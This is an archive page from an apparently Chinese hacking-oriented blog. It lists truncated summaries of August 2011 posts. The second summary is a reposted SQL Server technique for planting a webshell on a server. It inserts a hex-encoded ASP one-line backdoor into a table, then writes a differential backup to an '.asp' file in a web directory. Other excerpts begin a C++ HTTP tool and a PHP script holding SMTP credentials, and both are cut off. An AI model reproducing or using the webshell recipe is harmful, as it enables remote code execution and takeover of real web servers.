08 2011 档案

摘要:Here's to the crazy ones. The misfits. The rebels. The troublemakers. The round pegs in the square holes. The ones who see things differently. They're not fond of rules. And they have no respect for the status quo. You can quote them, disagree with them, glorify or vilify them. About the onl 阅读全文
posted @ 2011-08-26 14:20 noevil 阅读(222) 评论(0) 推荐(0)
摘要:[ 转载开始... ]1.完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.bak';--2.创建表并插曲入数据create table [dbo].[dtest] ([cmd] [image]);insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--3.进行差异备份backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORM 阅读全文
posted @ 2011-08-20 20:55 noevil 阅读(5396) 评论(0) 推荐(0)
该文被密码保护。
posted @ 2011-08-17 14:16 noevil 阅读(2) 评论(0) 推荐(0)
摘要:#include <stdio.h>#include <iostream>#include <windows.h>#include <string.h>#include "HTTPCore/HTTP.h"#include "HTTPCore/HTTPCore.h"#pragma comment(lib, "HTTPCore.lib")#pragma comment(lib, "ws2_32.lib")#pragma comment(lib, "ssleay3 阅读全文
posted @ 2011-08-15 00:58 noevil 阅读(480) 评论(0) 推荐(0)
摘要:<?php error_reporting(0); date_default_timezone_set('Asia/Shanghai'); // SETTING$password = ''; // PASSWORD OF DOUBLE MD5$smtpserver = 'smtp.mail.yahoo.com.cn'; // SMTP SERVICE$smtpserverport = 25; // SMTP PORT$smtpusermail = 'noevilsparrow@yahoo.cn'; // SMTP USER$ 阅读全文
posted @ 2011-08-11 03:48 noevil 阅读(484) 评论(0) 推荐(1)